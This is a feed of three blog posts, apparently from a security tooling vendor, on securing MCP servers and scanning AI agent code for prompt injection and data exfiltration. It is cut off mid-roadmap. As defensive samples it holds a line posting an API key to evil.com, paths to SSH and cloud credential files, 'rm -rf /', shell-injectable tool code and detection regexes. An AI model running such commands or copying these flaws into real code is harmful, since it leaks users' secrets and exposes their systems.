DEV Community: Dockfix Labs The latest articles on DEV Community by Dockfix Labs (@dockfixlabs). https://dev.to/dockfixlabs https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3995837%2Ff60605ed-5184-422c-8104-c39d3a3beb78.png DEV Community: Dockfix Labs https://dev.to/dockfixlabs en Securing MCP Servers: A Practical Guide Dockfix Labs Mon, 29 Jun 2026 01:00:36 +0000 https://dev.to/dockfixlabs/securing-mcp-servers-a-practical-guide-6n7 https://dev.to/dockfixlabs/securing-mcp-servers-a-practical-guide-6n7 <h2> What is MCP and Why Does Security Matter? </h2> <p>The <a href="https://modelcontextprotocol.io/" rel="noopener noreferrer">Model Context Protocol</a> (MCP) is an open standard that lets AI assistants connect to external tools, databases, and APIs. Claude Code, Cursor, and other AI coding assistants use MCP servers to extend their capabilities.</p> <p>But every MCP server is a potential attack surface. A malicious or misconfigured MCP server can:</p> <ul> <li>Execute arbitrary commands on your machine</li> <li>Read sensitive files (SSH keys, .env, credentials)</li> <li>Send your data to external servers</li> <li>Install malicious packages</li> <li>Override safety instructions in the AI assistant</li> </ul> <h2> Common MCP Security Risks </h2> <h3> 1. Command Injection via Tool Arguments </h3> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"tools"</span><span class="p">:</span><span class="w"> </span><span class="p">[{</span><span class="w"> </span><span class="nl">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"run_shell"</span><span class="p">,</span><span class="w"> </span><span class="nl">"description"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Run a shell command"</span><span class="p">,</span><span class="w"> </span><span class="nl">"inputSchema"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"object"</span><span class="p">,</span><span class="w"> </span><span class="nl">"properties"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"command"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="nl">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"string"</span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>This tool passes user input directly to a shell. An attacker can craft a malicious prompt that makes the AI execute <code>rm -rf /</code> or exfiltrate data via <code>curl</code>.</p> <h3> 2. Unrestricted File Access </h3> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"tools"</span><span class="p">:</span><span class="w"> </span><span class="p">[{</span><span class="w"> </span><span class="nl">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"read_file"</span><span class="p">,</span><span class="w"> </span><span class="nl">"inputSchema"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"object"</span><span class="p">,</span><span class="w"> </span><span class="nl">"properties"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"path"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="nl">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"string"</span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>No path validation means the AI can read <code>~/.ssh/id_rsa</code>, <code>~/.aws/credentials</code>, or <code>/etc/passwd</code>.</p> <h3> 3. External Network Calls </h3> <p>An MCP server that makes HTTP requests to arbitrary URLs can be used as a data exfiltration channel:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="nd">@mcp.tool</span><span class="p">()</span> <span class="k">def</span> <span class="nf">fetch_url</span><span class="p">(</span><span class="n">url</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">str</span><span class="p">:</span> <span class="k">return</span> <span class="n">requests</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="n">url</span><span class="p">).</span><span class="n">text</span> <span class="c1"># No URL validation! </span></code></pre> </div> <h3> 4. Missing Rate Limits </h3> <p>Without rate limits, an attacker can:</p> <ul> <li>Exhaust API quotas</li> <li>Generate huge bills</li> <li>DoS the underlying service</li> </ul> <h3> 5. Unpinned Dependencies </h3> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"dependencies"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"some-package"</span><span class="p">:</span><span class="w"> </span><span class="s2">"*"</span><span class="w"> </span><span class="err">#</span><span class="w"> </span><span class="err">Latest</span><span class="w"> </span><span class="err">version</span><span class="p">,</span><span class="w"> </span><span class="err">always</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>If a dependency is compromised (supply chain attack), your MCP server automatically installs the malicious version.</p> <h2> How to Audit Your MCP Configuration </h2> <h3> Manual Review Checklist </h3> <ol> <li> <strong>List all tools</strong> -- what can each tool do?</li> <li> <strong>Check input validation</strong> -- are arguments sanitized?</li> <li> <strong>Check file access</strong> -- is access restricted to specific directories?</li> <li> <strong>Check network calls</strong> -- are outbound URLs whitelisted?</li> <li> <strong>Check dependencies</strong> -- are they pinned to specific versions?</li> <li> <strong>Check permissions</strong> -- does the server run as root?</li> <li> <strong>Check logging</strong> -- are secrets being logged?</li> </ol> <h3> Automated Scanning with MCP Scanner </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>pip <span class="nb">install </span>dfx-mcp-scanner </code></pre> </div> <p>The <a href="https://github.com/dockfixlabs/mcp-scanner" rel="noopener noreferrer">MCP Scanner</a> automatically checks MCP server configurations for the risks above:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Scan a Claude Code config</span> mcp-scanner ~/.claude/mcp.json <span class="c"># Scan a Cursor config</span> mcp-scanner ~/.cursor/mcp.json <span class="c"># JSON output for CI/CD</span> mcp-scanner config.json <span class="nt">--format</span> json </code></pre> </div> <p>It detects:</p> <ul> <li>Tools with unrestricted shell access</li> <li>Tools with unrestricted file read/write</li> <li>External network calls without URL validation</li> <li>Missing rate limits</li> <li>Unpinned dependencies</li> <li>Hardcoded credentials in config</li> <li>And more (7 security checks total)</li> </ul> <h3> Combining with AgentGuard </h3> <p>For full coverage, use both tools together:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Scan MCP configuration</span> mcp-scanner ~/.claude/mcp.json <span class="c"># Scan the MCP server source code</span> agentguard ./my-mcp-server/ <span class="nt">--format</span> sarif </code></pre> </div> <p><a href="https://github.com/dockfixlabs/mcp-scanner" rel="noopener noreferrer">MCP Scanner</a> audits the configuration. <a href="https://github.com/dockfixlabs/agentguard" rel="noopener noreferrer">AgentGuard</a> audits the implementation.</p> <h2> Best Practices for MCP Server Authors </h2> <h3> 1. Validate All Inputs </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">pathlib</span> <span class="kn">import</span> <span class="n">Path</span> <span class="nd">@mcp.tool</span><span class="p">()</span> <span class="k">def</span> <span class="nf">read_file</span><span class="p">(</span><span class="n">path</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">str</span><span class="p">:</span> <span class="c1"># Restrict to allowed directory </span> <span class="n">allowed</span> <span class="o">=</span> <span class="nc">Path</span><span class="p">(</span><span class="sh">"</span><span class="s">/safe/directory</span><span class="sh">"</span><span class="p">)</span> <span class="n">target</span> <span class="o">=</span> <span class="p">(</span><span class="n">allowed</span> <span class="o">/</span> <span class="n">path</span><span class="p">).</span><span class="nf">resolve</span><span class="p">()</span> <span class="k">if</span> <span class="ow">not</span> <span class="nf">str</span><span class="p">(</span><span class="n">target</span><span class="p">).</span><span class="nf">startswith</span><span class="p">(</span><span class="nf">str</span><span class="p">(</span><span class="n">allowed</span><span class="p">)):</span> <span class="k">raise</span> <span class="nc">ValueError</span><span class="p">(</span><span class="sh">"</span><span class="s">Path traversal detected</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="n">target</span><span class="p">.</span><span class="nf">read_text</span><span class="p">()</span> </code></pre> </div> <h3> 2. Whitelist External URLs </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">ALLOWED_DOMAINS</span> <span class="o">=</span> <span class="p">{</span><span class="sh">"</span><span class="s">api.github.com</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">api.openai.com</span><span class="sh">"</span><span class="p">}</span> <span class="nd">@mcp.tool</span><span class="p">()</span> <span class="k">def</span> <span class="nf">fetch_url</span><span class="p">(</span><span class="n">url</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">str</span><span class="p">:</span> <span class="kn">from</span> <span class="n">urllib.parse</span> <span class="kn">import</span> <span class="n">urlparse</span> <span class="n">domain</span> <span class="o">=</span> <span class="nf">urlparse</span><span class="p">(</span><span class="n">url</span><span class="p">).</span><span class="n">hostname</span> <span class="k">if</span> <span class="n">domain</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">ALLOWED_DOMAINS</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">ValueError</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Domain </span><span class="si">{</span><span class="n">domain</span><span class="si">}</span><span class="s"> not allowed</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="n">requests</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">10</span><span class="p">).</span><span class="n">text</span> </code></pre> </div> <h3> 3. Pin Dependencies </h3> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"dependencies"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"requests"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2.31.0"</span><span class="p">,</span><span class="w"> </span><span class="nl">"pydantic"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2.5.0"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <h3> 4. Run as Non-Root </h3> <div class="highlight js-code-highlight"> <pre class="highlight docker"><code><span class="k">USER</span><span class="s"> 1000:1000</span> </code></pre> </div> <h3> 5. Add Rate Limits </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">collections</span> <span class="kn">import</span> <span class="n">defaultdict</span> <span class="kn">from</span> <span class="n">time</span> <span class="kn">import</span> <span class="n">time</span> <span class="n">RATE_LIMIT</span> <span class="o">=</span> <span class="p">{}</span> <span class="n">RATE_WINDOW</span> <span class="o">=</span> <span class="mi">60</span> <span class="c1"># seconds </span><span class="n">RATE_MAX</span> <span class="o">=</span> <span class="mi">10</span> <span class="c1"># calls per window </span> <span class="k">def</span> <span class="nf">check_rate_limit</span><span class="p">(</span><span class="n">client_id</span><span class="p">:</span> <span class="nb">str</span><span class="p">):</span> <span class="n">now</span> <span class="o">=</span> <span class="nf">time</span><span class="p">()</span> <span class="k">if</span> <span class="n">client_id</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">RATE_LIMIT</span><span class="p">:</span> <span class="n">RATE_LIMIT</span><span class="p">[</span><span class="n">client_id</span><span class="p">]</span> <span class="o">=</span> <span class="p">[]</span> <span class="n">RATE_LIMIT</span><span class="p">[</span><span class="n">client_id</span><span class="p">]</span> <span class="o">=</span> <span class="p">[</span><span class="n">t</span> <span class="k">for</span> <span class="n">t</span> <span class="ow">in</span> <span class="n">RATE_LIMIT</span><span class="p">[</span><span class="n">client_id</span><span class="p">]</span> <span class="k">if</span> <span class="n">now</span> <span class="o">-</span> <span class="n">t</span> <span class="o">&lt;</span> <span class="n">RATE_WINDOW</span><span class="p">]</span> <span class="k">if</span> <span class="nf">len</span><span class="p">(</span><span class="n">RATE_LIMIT</span><span class="p">[</span><span class="n">client_id</span><span class="p">])</span> <span class="o">&gt;=</span> <span class="n">RATE_MAX</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">Exception</span><span class="p">(</span><span class="sh">"</span><span class="s">Rate limit exceeded</span><span class="sh">"</span><span class="p">)</span> <span class="n">RATE_LIMIT</span><span class="p">[</span><span class="n">client_id</span><span class="p">].</span><span class="nf">append</span><span class="p">(</span><span class="n">now</span><span class="p">)</span> </code></pre> </div> <h2> Conclusion </h2> <p>MCP servers are powerful extensions for AI assistants, but they introduce real security risks. Audit your configurations regularly, validate all inputs, restrict file and network access, and use automated tools to catch issues early.</p> <h2> Tools Mentioned </h2> <ul> <li> <a href="https://github.com/dockfixlabs/agentguard" rel="noopener noreferrer">AgentGuard</a> -- OWASP ASI Top 10 scanner for AI agent code</li> <li> <a href="https://github.com/dockfixlabs/mcp-scanner" rel="noopener noreferrer">MCP Scanner</a> -- Security scanner for MCP server configurations</li> <li> <a href="https://github.com/dockfixlabs/agentguard-benchmark" rel="noopener noreferrer">AgentGuard Benchmark</a> -- 28 vulnerable code samples for testing</li> </ul> <p><em>All tools are MIT-licensed and open source. Install with <code>pip install dfx-agentguard dfx-mcp-scanner</code>.</em></p> ai security mcp tutorial Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities Dockfix Labs Sun, 28 Jun 2026 22:45:51 +0000 https://dev.to/dockfixlabs/beyond-regex-building-detection-rules-for-ai-agent-vulnerabilities-hi3 https://dev.to/dockfixlabs/beyond-regex-building-detection-rules-for-ai-agent-vulnerabilities-hi3 <h2> Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities </h2> <p>When I started building <a href="https://github.com/dockfixlabs/agentguard" rel="noopener noreferrer">AgentGuard</a>, the first question was: how do you detect a prompt injection vulnerability in source code?</p> <p>Unlike traditional vulnerabilities (SQL injection, XSS), prompt injection doesn't have a single signature. It's a pattern of <strong>untrusted data flowing into LLM context</strong>. The vulnerability isn't in a function call -- it's in how data is constructed.</p> <h3> The Regex Foundation </h3> <p>Every SAST tool starts with pattern matching. AgentGuard's first layer is regex-based rules:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># ASI01: Prompt Injection </span><span class="n">FSTRING_INJECTION</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="nf">compile</span><span class="p">(</span> <span class="sa">r</span><span class="sh">'</span><span class="s">(?:prompt|system|message|instruction)\s*[:=]\s*f[</span><span class="sh">"</span><span class="s">\'].*\{.*\}</span><span class="sh">'</span><span class="p">,</span> <span class="n">re</span><span class="p">.</span><span class="n">I</span> <span class="p">)</span> </code></pre> </div> <p>This catches the most common pattern: f-strings that embed user input directly into LLM prompts. It is blunt but effective. In a scan of 50 open-source agent codebases, this single rule found 127 instances.</p> <h3> The Problem with Regex </h3> <p>Regex has limits. Consider:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Pattern A: Obvious </span><span class="n">prompt</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"</span><span class="s">You are a helper. </span><span class="si">{</span><span class="n">user_input</span><span class="si">}</span><span class="sh">"</span> <span class="c1"># Pattern B: Subtle </span><span class="n">template</span> <span class="o">=</span> <span class="sh">"</span><span class="s">You are a helper. {input}</span><span class="sh">"</span> <span class="n">prompt</span> <span class="o">=</span> <span class="n">template</span><span class="p">.</span><span class="nf">format</span><span class="p">(</span><span class="nb">input</span><span class="o">=</span><span class="n">user_data</span><span class="p">)</span> <span class="c1"># Pattern C: Hidden </span><span class="n">messages</span> <span class="o">=</span> <span class="p">[{</span><span class="sh">"</span><span class="s">role</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">system</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">content</span><span class="sh">"</span><span class="p">:</span> <span class="n">config</span><span class="p">[</span><span class="sh">"</span><span class="s">system_prompt</span><span class="sh">"</span><span class="p">]</span> <span class="o">+</span> <span class="n">user_message</span><span class="p">}]</span> </code></pre> </div> <p>Pattern A is trivial to detect. Pattern B requires understanding <code>.format()</code> semantics. Pattern C requires tracking data flow through dictionaries and list construction.</p> <p>This is where AgentGuard is headed next: <strong>AST-based semantic analysis</strong>.</p> <h3> The AST Layer (Roadmap) </h3> <p>The next version of AgentGuard will parse Python and JavaScript ASTs to track taint flow:</p> <ol> <li> <strong>Identify sources</strong>: function parameters named <code>user_input</code>, <code>query</code>, <code>message</code>, <code>request.body</code> </li> <li> <strong>Track propagation</strong>: variable assignments, string formatting, list/dict construction</li> <li> <strong>Identify sinks</strong>: <code>openai.chat.completions.create</code>, <code>prompt</code>, <code>messages</code>, <code>system</code> </li> <li> <strong>Flag paths</strong>: any path from source to sink without sanitization</li> </ol> <p>This is the same approach Semgrep and CodeQL use for traditional vulnerabilities, but specialized for LLM-specific sinks.</p> <h3> Correlation Detection </h3> <p>AgentGuard already does a simple form of correlation for ASI03 (Data Exfiltration):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Line 1: Secret access </span><span class="n">api_key</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">environ</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">API_KEY</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Line 2: Network call </span><span class="n">requests</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="sh">"</span><span class="s">https://evil.com/collect</span><span class="sh">"</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">Auth</span><span class="sh">"</span><span class="p">:</span> <span class="n">api_key</span><span class="p">})</span> </code></pre> </div> <p>The rule checks if a secret-access pattern appears on line N and a network-exfiltration pattern appears on line N+1. This catches the most dangerous pattern: an agent that reads credentials and sends them externally.</p> <p>Future versions will extend this to full function-level taint tracking.</p> <h3> The OWASP ASI Top 10 Coverage </h3> <p>AgentGuard currently covers all 10 categories:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>ASI</th> <th>Rule</th> <th>Detection Method</th> </tr> </thead> <tbody> <tr> <td>ASI01</td> <td>Prompt Injection</td> <td>Regex (f-string, concat, format)</td> </tr> <tr> <td>ASI02</td> <td>Tool Abuse</td> <td>Regex (os.system, subprocess, eval)</td> </tr> <tr> <td>ASI03</td> <td>Data Exfiltration</td> <td>Regex + cross-line correlation</td> </tr> <tr> <td>ASI04</td> <td>Excessive Agency</td> <td>Regex (auto-execute, no-confirm)</td> </tr> <tr> <td>ASI05</td> <td>Supply Chain</td> <td>Regex (untrusted pip install, dynamic import)</td> </tr> <tr> <td>ASI06</td> <td>Insecure Output</td> <td>Regex (raw HTML, eval output)</td> </tr> <tr> <td>ASI07</td> <td>Credential Exposure</td> <td>Regex (API keys, private keys, passwords)</td> </tr> <tr> <td>ASI08</td> <td>Context Manipulation</td> <td>Regex (context stuffing, token bombing)</td> </tr> <tr> <td>ASI09</td> <td>Agent Loop Exploitation</td> <td>Regex (recursive calls, no depth limit)</td> </tr> <tr> <td>ASI10</td> <td>Trust Boundary</td> <td>Regex (mixed privilege, cross-agent calls)</td> </tr> </tbody> </table></div> <h3> Benchmark Results </h3> <p>The <a href="https://github.com/dockfixlabs/agentguard-benchmark" rel="noopener noreferrer">benchmark suite</a> has 28 samples:</p> <ul> <li>ASI01 (6 samples): 100% detection</li> <li>ASI02 (5 samples): 100% detection</li> <li>ASI03 (4 samples): 100% detection</li> <li>ASI07 (6 samples): 100% detection</li> <li>ASI10 (5 samples): 100% detection</li> <li>Clean (2 samples): 0% false positives</li> </ul> <h3> What's Next </h3> <ol> <li> <strong>AST-based taint tracking</strong> for Python and JavaScript</li> <li> <strong>Language support</strong>: Rust, Go, Java</li> <li> <strong>GitHub Code Scanning</strong> integration via SARIF</li> <li> <strong>MCP server mode</strong> for real-time scanning in AI coding assistants</li> <li> <strong>Semantic injection detection</strong> -- understanding prompt structure, not just string patterns</li> </ol> <p>The long-term goal is simple: <strong>make AI agent code as auditable as web application code</strong>. We have Semgrep for web apps. We need AgentGuard for agent apps.</p> <p><em><a href="https://github.com/dockfixlabs/agentguard" rel="noopener noreferrer">AgentGuard</a> is MIT-licensed and open source. Install with <code>pip install dfx-agentguard</code>.</em></p> ai security python devtools AgentGuard: Open-Source Security Scanning for AI Agent Code Dockfix Labs Sun, 28 Jun 2026 22:41:23 +0000 https://dev.to/dockfixlabs/agentguard-open-source-security-scanning-for-ai-agent-code-2d66 https://dev.to/dockfixlabs/agentguard-open-source-security-scanning-for-ai-agent-code-2d66 <h2> The Problem </h2> <p>AI agents are being deployed at scale — in customer support, code generation, data analysis, and autonomous workflows. But the code that powers these agents is rarely security-audited.</p> <p>Consider this pattern, common in production agent codebases:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">user_input</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="nf">json</span><span class="p">()[</span><span class="sh">"</span><span class="s">prompt</span><span class="sh">"</span><span class="p">]</span> <span class="n">prompt</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"</span><span class="s">You are a helpful assistant. </span><span class="si">{</span><span class="n">user_input</span><span class="si">}</span><span class="sh">"</span> <span class="n">response</span> <span class="o">=</span> <span class="n">openai</span><span class="p">.</span><span class="n">chat</span><span class="p">.</span><span class="n">completions</span><span class="p">.</span><span class="nf">create</span><span class="p">(</span> <span class="n">model</span><span class="o">=</span><span class="sh">"</span><span class="s">gpt-4</span><span class="sh">"</span><span class="p">,</span> <span class="n">messages</span><span class="o">=</span><span class="p">[{</span><span class="sh">"</span><span class="s">role</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">user</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">content</span><span class="sh">"</span><span class="p">:</span> <span class="n">prompt</span><span class="p">}]</span> <span class="p">)</span> </code></pre> </div> <p>This is a <strong>prompt injection</strong> vulnerability. A user can override the system prompt and manipulate the agent's behavior. It is the AI equivalent of SQL injection — and it is everywhere.</p> <h2> OWASP ASI Top 10 </h2> <p>The <a href="https://owasp.org/www-project-agentic-security/" rel="noopener noreferrer">OWASP Agentic Security Initiative</a> published a Top 10 list of risks specific to AI agent systems:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>ID</th> <th>Risk</th> </tr> </thead> <tbody> <tr> <td>ASI01</td> <td>Prompt Injection</td> </tr> <tr> <td>ASI02</td> <td>Tool Abuse / Unintended Tool Use</td> </tr> <tr> <td>ASI03</td> <td>Data Exfiltration / Sensitive Data Leakage</td> </tr> <tr> <td>ASI04</td> <td>Unauthorized Actions / Excessive Agency</td> </tr> <tr> <td>ASI05</td> <td>Supply Chain / Untrusted Components</td> </tr> <tr> <td>ASI06</td> <td>Insecure Output Handling</td> </tr> <tr> <td>ASI07</td> <td>Credential / Secret Exposure</td> </tr> <tr> <td>ASI08</td> <td>Context Window Manipulation</td> </tr> <tr> <td>ASI09</td> <td>Agent Loop Exploitation</td> </tr> <tr> <td>ASI10</td> <td>Trust Boundary Violation</td> </tr> </tbody> </table></div> <p>Most of these have no coverage in traditional SAST tools. Semgrep and CodeQL were built for a world without LLMs.</p> <h2> AgentGuard </h2> <p><a href="https://github.com/dockfixlabs/agentguard" rel="noopener noreferrer">AgentGuard</a> is an open-source static analysis tool that scans AI agent codebases for all 10 OWASP ASI categories.</p> <h3> Install </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>pip <span class="nb">install </span>dfx-agentguard </code></pre> </div> <h3> Usage </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Scan current directory</span> agentguard <span class="nb">.</span> <span class="c"># JSON output for CI/CD</span> agentguard src/ <span class="nt">--format</span> json <span class="c"># SARIF for GitHub code scanning</span> agentguard <span class="nb">.</span> <span class="nt">--format</span> sarif </code></pre> </div> <h3> What It Detects </h3> <p><strong>Prompt Injection (ASI01)</strong> — f-string prompt construction, string concatenation with user input, system prompt overrides.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Vulnerable </span><span class="n">prompt</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"</span><span class="s">You are a helpful assistant. </span><span class="si">{</span><span class="n">user_input</span><span class="si">}</span><span class="sh">"</span> <span class="c1"># AgentGuard flags this as ASI01-PROMPT-INJECTION </span></code></pre> </div> <p><strong>Tool Abuse (ASI02)</strong> — <code>os.system()</code>, <code>subprocess</code> with user input, <code>eval()</code>/<code>exec()</code> in agent tool functions.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Vulnerable </span><span class="k">def</span> <span class="nf">run_command</span><span class="p">(</span><span class="n">query</span><span class="p">):</span> <span class="k">return</span> <span class="n">os</span><span class="p">.</span><span class="nf">system</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">echo </span><span class="si">{</span><span class="n">query</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># AgentGuard flags this as ASI02-TOOL-ABUSE </span></code></pre> </div> <p><strong>Data Exfiltration (ASI03)</strong> — <code>requests.post()</code> to external URLs, <code>fetch()</code> calls, webhook configurations, DNS-based exfiltration patterns, subprocess <code>curl</code>/<code>wget</code> calls.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Vulnerable </span><span class="n">requests</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="sh">"</span><span class="s">https://analytics-server.com/collect</span><span class="sh">"</span><span class="p">,</span> <span class="n">json</span><span class="o">=</span><span class="n">agent_data</span><span class="p">)</span> <span class="c1"># AgentGuard flags this as ASI03-DATA-EXFIL </span></code></pre> </div> <p><strong>Credential Exposure (ASI07)</strong> — hardcoded API keys (<code>sk-proj-*</code>, <code>AKIA*</code>, <code>ghp_*</code>), private keys, connection strings with passwords, wallet seed phrases, Slack tokens, Google API keys.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Vulnerable </span><span class="n">OPENAI_API_KEY</span> <span class="o">=</span> <span class="sh">"</span><span class="s">sk-proj-Tq8m2X4vN7bR1wK9pL3hY6jD5cF0aZ8s</span><span class="sh">"</span> <span class="c1"># AgentGuard flags this as ASI07-CREDENTIAL-LEAK </span></code></pre> </div> <p>Plus: Excessive Agency (ASI04), Supply Chain (ASI05), Insecure Output Handling (ASI06), Context Manipulation (ASI08), Agent Loop Exploitation (ASI09), Trust Boundary Violations (ASI10).</p> <h2> Integration Options </h2> <h3> CLI </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>agentguard <span class="nb">.</span> <span class="nt">--format</span> text agentguard <span class="nb">.</span> <span class="nt">--format</span> json <span class="nt">--exit-code</span> agentguard <span class="nb">.</span> <span class="nt">--format</span> sarif </code></pre> </div> <h3> Pre-commit Hook </h3> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="c1"># .pre-commit-config.yaml</span> <span class="na">repos</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">repo</span><span class="pi">:</span> <span class="s">https://github.com/dockfixlabs/agentguard</span> <span class="na">rev</span><span class="pi">:</span> <span class="s">v0.2.2</span> <span class="na">hooks</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">agentguard</span> </code></pre> </div> <h3> GitHub Action </h3> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="c1"># .github/workflows/security.yml</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Agent Security Scan</span> <span class="na">on</span><span class="pi">:</span> <span class="pi">[</span><span class="nv">pull_request</span><span class="pi">]</span> <span class="na">jobs</span><span class="pi">:</span> <span class="na">scan</span><span class="pi">:</span> <span class="na">runs-on</span><span class="pi">:</span> <span class="s">ubuntu-latest</span> <span class="na">steps</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/checkout@v4</span> <span class="pi">-</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">dockfixlabs/agentguard@v0.2.2</span> <span class="na">with</span><span class="pi">:</span> <span class="na">path</span><span class="pi">:</span> <span class="s">src/</span> <span class="na">format</span><span class="pi">:</span> <span class="s">sarif</span> </code></pre> </div> <h3> MCP Server Mode </h3> <p>AgentGuard can run as a Model Context Protocol server, letting AI coding assistants (Claude Code, Cursor) scan code in real-time:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>agentguard <span class="nt">--mcp</span> </code></pre> </div> <h3> VS Code Extension </h3> <p>Inline diagnostics, scan-on-save, and a findings tree view. Available as a VSIX on the <a href="https://github.com/dockfixlabs/agentguard-vscode/releases" rel="noopener noreferrer">releases page</a>.</p> <h2> Benchmark Suite </h2> <p>The <a href="https://github.com/dockfixlabs/agentguard-benchmark" rel="noopener noreferrer">AgentGuard Benchmark</a> provides 28 vulnerable code samples across 5 OWASP ASI categories, plus clean code for false-positive testing.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>git clone https://github.com/dockfixlabs/agentguard-benchmark <span class="nb">cd </span>agentguard-benchmark python benchmark.py </code></pre> </div> <h2> Roadmap </h2> <ul> <li> <strong>Semantic analysis</strong> — AST-based detection beyond regex patterns</li> <li> <strong>Multi-language 